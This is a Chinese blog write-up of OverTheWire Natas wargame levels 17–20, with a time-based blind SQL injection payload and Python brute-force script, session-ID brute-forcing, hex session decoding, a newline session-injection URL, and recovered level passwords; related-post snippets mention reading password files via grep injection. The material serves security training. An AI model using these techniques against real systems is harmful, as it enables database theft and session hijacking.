170819 WarGames-Natas(17-20)

最新推荐文章于 2023-05-20 11:21:52 发布
最新推荐文章于 2023-05-20 11:21:52 发布
阅读量575 收藏
点赞数
分类专栏: WarGames
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whklhhhh/article/details/77412322
版权

1625-5 王子昂 总结《2017年8月19日》 【连续第321天总结】
A. Natas
B.

Level 17

本关的源代码与level15相同,只是把echo语句注释掉了
那么很容易想到,返回值全部被隐藏的时候,使用sql时间盲注
即虽然页面没有显示,但是可以通过sleep()函数的执行与否来反馈
具体构造爆username的shellcode为:

SELECT * from users where username=""or left(username,1)="a" and sleep(5) and "1"="1"

通过and的特性,如果前表达式返回True再执行后表达式,可以达到判断的效果
可以通过观察页面打开时间(脚本中设置timeout参数)来确定sleep()是否有执行,如果执行说明前表达式执行正确,否则执行错误
脚本同样在之前的基础上稍加改动即可:

        reqdata={'username':'natas18\" and ascii(substr(password,'+str(i)+',1))=ascii(\"'+ string + '\")and sleep(20) and "1"="1'}
        reqdata = parse.urlencode(reqdata).encode('utf-8')
        req=request.Request(url,data=reqdata,headers=headers)
        try:
            page=request.urlopen(req,timeout=2)
        except socket.timeout:
            return True//sleep()成功执行,说明string正确
        return Flase

这里可能跟自己的网速有关系,如果sleep函数未执行的延时都不小的话就需要调整一下timeout参数了(
测试了一下在等待的时候如果浏览别的网页/打开视频就会使得此处timeout大大加长,因此为了稳定下可以给多一些的timeout,例如5s
本来想着如果网速较差,timeout较大的话可能速度会比较感人,需要用多线程
但是大概看了一下多线程需要对整体结构做调整,结果处理完全没思路,本身的速度也差强人意,于是就懒得搞啦~
又想了一下,由于比较ascii所以pw之间是独立的爆破,完全可以用多线程啦~
修改脚本:

#在初始化函数中声明self.pw=[0 for x in range(32)]
    def brute(self,key,i):
        for char in self.chars:
            string=chr(char)
            result=self.httpcon(string,i)
            if(result):
                self.pw[i-1] = string#将爆出的结果存入结果中
                print(i, string)
                # self.brute(string, i + 1)
                break

    def run(self):
        ls_thread=[]
        for i in range(32):
            t=threading.Thread(target=self.brute,args=('',i+1))#每个字符给予一个线程
            ls_thread.append(t)
            t.start()
        for t in ls_thread:
            t.join()#等待所有线程完成
        print("Finished.\nThe password is ", "".join(self.pw))

顺便附上感觉不错的盲注的学习页面:http://www.jianshu.com/p/65f05e7cc957

先爆出username为natas18,然后爆出password:

The password is xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP

Level 18

这次的PHP脚本是一个Session登录的模拟

if(my_session_start()) { 
    print_credentials(); 
    $showform = false; 
} else { 
    if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) { 
    session_id(createID($_REQUEST["username"])); 
    session_start(); 
    $_SESSION["admin"] = isValidAdminLogin(); 
    debug("New session started"); 
    $showform = false; 
    print_credentials(); 
    } 
}

服务器检索Cookies中保存的SessionID,库中没有则新建,有则检查admin值
由于isValidAdminLogin()只会对admin赋0,因此新的SessionID是不可通过的
那么只能寻找本来就存在的SessionID,脚本中提示了最大值为640,因此写脚本爆破即可
将headers中添加cookie项,并修改PHPSESSID
多线程几秒钟就能爆出ID=138时admin=1,得到pw:

4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
Level 19

这次不显示脚本,提示sessions ID不连续
抓包观察SessionID为”3236382d61646d696e”
32这个数字是’2’的十六进制ASCII
大体扫下去基本都不超出ASCII的范围,那写一个脚本转换一下试试
发现它果然是“268-admin”的ASCII
那就很简单了,跟上一题一样,只是稍微多一步转换过程
跑出SessionID为”89-admin”的ASCII“38392d61646d696e”,pw:

eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

Level 20

本次的PHP脚本大致流程为
首先合法校验,检测sessionID是否只有数字和字母
通过后读取以ID为文件名的文件,若空则新建
以\n为分隔符,然后空格分隔Key和Value
若admin=1则成功
由于sessionID进行了合法性校验,因此无法直接读取密码文件的信息
但username没有校验,因此可以在其中注入’\nadmin 1’使读取的时候对Session进行修改
URL为

http://natas20.natas.labs.overthewire.org/index.php?debug&name=123 %0Aadmin 1

注意直接输入’\n’是不会被写入文件的,因此需要通过URL编码绕一下
得到pw:

IFekPyrQXftziDEsUr3x21sYuahypdgJ

C. 明日计划
NATAS

奈沙夜影
关注
专栏目录
OverTheWire-Natas
LJFYYJ的博客
07-23 911
natas前17,待更新~
170817 WarGames-Natas(15)
whklhhhh的博客
08-17 359
1625-5 王子昂 总结《2017年8月17日》 【连续第319天总结】 A. WarGames-Natas B. Level 15这SQL注入明显比上一难多了,PHP代码如下:if(array_key_exists("username", $_REQUEST)) { $link = mysql_connect('localhost', 'natas15', '<censo
Natas Wargame Level 17 Writeup(Time-based Blind SQL Injection)
a_18067的博客
05-15 217
sourcecode核心代码: 1 <? 2 3 /* 4 CREATE TABLE `users` ( 5 `username` varchar(64) DEFAULT NULL, 6 `password` varchar(64) DEFAULT NULL 7 ); 8 */ 9 10 if(array_key_exi...
wargame-Natas(1-20)
weixin_43220691的博客
11-30 2478
wargame-natas write up
Natas Wargame Level20 Writeup(会话状态注入/篡改)
a_18067的博客
05-20 163
sourcecode核心代码: 1 <? 2 3 function debug($msg) { 4 if(array_key_exists("debug", $_GET)) { 5 print "DEBUG: $msg<br>"; 6 } 7 } 8 9 functi...
Natas Wargame Level 19 Writeup(猜测令牌,会话劫持)
a_18067的博客
05-19 162
根据题目提示,这个题跟上一个题差不多,但是会话编码不再是连续的了。 一开始我跟上一个题一样,不断输入’admin‘:’1’ 并使headers里面没有cookie,从而根据返回的set-cookie判断会话编码的方式。 结果发现编码的大多数位都是一样的,只有4个位在变化,于是我以为这个题只是给编码空间用很多位打了个‘掩护’,其实空间还是很小的。变使用这四个位进行猜测,无果。 ...
WarGame系列之Natas(Web安全)通指北(中级篇11-20) 详细版
KEY0NE的个人博客
09-18 429
本系列文章旨在记录笔者通思路,其中解题思路也会参考借鉴网上已有文章,在此感谢相作者的分享精神接着上一篇文章继续natas11整理下此题的核心代码<? $defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff"); function xor_encrypt($in) { ...
170822 WarGames-Natas(27-28)
whklhhhh的博客
08-22 762
1625-5 王子昂 总结《2017年8月22日》 【连续第323天总结】 A. Natas B.Level 27按照之前sql注入的尿性,username应该是natas28,试一下回复Wrong password确认无误 本来以为是宽字节注入,绕过mysql_real_escape_string()函数 原理是该函数对单引号等字符自动进行转义,在前边添加’\’ 单引号字符为0x27
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
"Natas-master"压缩包文件可能包含了一个Natas游戏解决方案的完整集合,包括了各个级别的解题思路和代码示例。玩家可以参考这些资源,结合自己的实践,加深对Web安全的理解。 总之,Natas游戏提供了一个理想的环境...
OVerTheWire:NATAS通0-20
friutUncil的博客
09-30 1127
LV0 natas将是一些服务端的安全基础知识,ok,试一下吧 You can find the password for the next level on this page. 打开就是这句话,在此页能找到密码,但是找不到呀,那就看下源码吧 F12 再注释里找到密码 The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto LV...
Wargames靶场之natas(web安全)
weixin_50764099的博客
04-24 945
Natas系列包含服务器端Web安全的基础知识。每个级别的 natas 都由位于处的自己的网站组成,其中 X 是级别 数。。要访问某个级别,请输入用户名 对于该级别(例如,NATAS0 表示级别 0)及其密码。每个级别都可以访问下一级的密码。你的任务是以某种方式获取下一个密码并升级。。例如,存储 natas5 的密码 在文件 /etc/natas_webpass/natas5 中,只有 natas4 和 纳塔斯5。
natas15 题解
lyover的博客
11-25 955
natas一系列是国外的web安全游戏,可以真正的帮你练习web渗透,不单单是依靠工具,这次要写的就是一个sql盲注的脚本,下边附上第一的网址 http://overthewire.org/wargames/natas/natas0.html 前几还都好过,到了后边越来越难,写题解的大多都是外国,国内能的搜到只有很少,而且看了国内某巨巨用linux写的各种题解,云里雾里,只好跑到国外看
网络空间安全——Wargame靶场(Natas)
最新发布
weixin_44717952的博客
05-20 1361
访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
natas16 题解
lyover的博客
11-26 1080
本题与上一题相似(可看我上篇文章nata15 题解) 进入后发现和早前某像,执行一个grep命令查找,这里的过滤字符中恰恰没包括 $ . * 这三个,可以利用$(grep -E ^8.* /etc/natas_webpasswd/natas17)hello 这样去输入 如果返回了hello和其他的字串,说明这里的grep没有执行,-E 是执行一个正则表达式,^8,* 这个表达式的意思是以8开
WarGames-Natas(16)
whklhhhh的博客
08-18 538
natas(16)<? $key = "";if(array_key_exists("needle", $_REQUEST)) { $key = $_REQUEST["needle"]; }if($key != "") { if(preg_match('/[;|&`\'"]/',$key)) { print "Input contains an illegal cha
natas通记录
weixin_42728957的博客
12-10 2904
OverTheWire 是一个 wargame 网站。其中 Natas 是一个适合学习Web安全基础的游戏,在Natas 中,我们需要通过找到网站的漏洞获得通往下一的密码。每一都有一个网站,类似 http://natasX.natas.labs.overthewire.org,其中X是每一的编号。每一都要输入用户名(例如,level0的用户名是natas0)及其密码才能访问。所有密码存储在...
OverTheWire的natas游戏(13-20)
qq_40710190的博客
07-08 303
natas solution(13-20) Natas Level 12 → Level 13 Username: natas13 URL: http://natas13.natas.labs.overthewire.org 这一和上一非常相似,不同的在于 <?php if(array_key_exists("filename", $_POST)) { $target_path = makeRandomPathFromFilename("upload", $_POST["fil
web向wargamenatas通手记
陈文青
08-16 7606
与之前做过的跟ssh和终端打交道的题目不同,nat
natas(11-20
半夜好饿的博客
08-18 1033
natas11: 同样查看源码,审计。想要得到密码,需要使showpassword设置为yes,loadData函数是将cookie的值解密还原,存储与mydata数组中,并返回mydata。而savaData函数则是将传入的参数进行编码处理,存在COOKIE[“data”]中。 由此大体思路为,构造新的输入参数,是的showpassword值设置为yes,编码后得到新的data值。但完成这步,需...
Python库Natas-1.0.2详细解析
资源摘要信息:"Python库 | natas-1.0.2.tar.gz" Python是一种广泛使用的高级编程语言,以其清晰的语法和强大的开发工具库而著称。Python库则是Python生态系统中的重要组成部分,它们提供了一系列预先编写好的函数和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值